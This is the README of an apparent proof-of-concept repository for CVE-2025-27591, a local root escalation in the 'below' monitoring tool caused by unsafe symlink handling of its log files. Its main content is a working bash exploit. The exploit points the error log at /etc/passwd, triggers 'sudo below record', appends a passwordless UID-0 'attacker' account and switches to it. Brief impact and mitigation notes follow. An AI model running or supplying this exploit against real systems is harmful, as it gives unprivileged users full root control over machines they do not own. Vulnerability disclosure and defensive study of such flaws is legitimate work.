CVE-2025-27591### CVE-2025-27591 - Privilege Escalation via Insecure Log Handling
#### Overview
CVE-2025-27591 is a **local privilege escalation vulnerability** in the `below` utility (versions prior to the patched release) caused by **insecure symbolic link handling** within its logging mechanism. Attackers with local access can exploit this flaw to overwrite arbitrary files as the root user, leading to full privilege escalation.
#### Vulnerability Details
The `below` tool writes logs to `/var/log/below/` without properly validating symbolic links. By pre-creating a symlink pointing to a sensitive file (e.g., `/etc/passwd`), an attacker can inject arbitrary content with elevated privileges when the vulnerable process runs under `sudo`.
#### Exploit Demonstration
```bash
# Check if log directory exists
test -d /var/log/below && ls -ld /var/log/below
# Remove existing log file and create a malicious symlink
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Prepare malicious passwd entry
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Trigger vulnerable behavior using sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Switch to the newly created root-privileged user
su attacker
```
#### Impact
Successful exploitation grants **root privileges** to a local, unprivileged attacker, enabling full system compromise.
#### Mitigation
- Apply the vendor patch immediately once available.
- Restrict access to `/var/log/below/` directory.
- Validate log file paths before writing to avoid following symbolic links.
[4.0K] /data/pocs/07a7f0dbd454caf184ef8767438619e151ecd063
└── [1.6K] README.md
1 directory, 1 file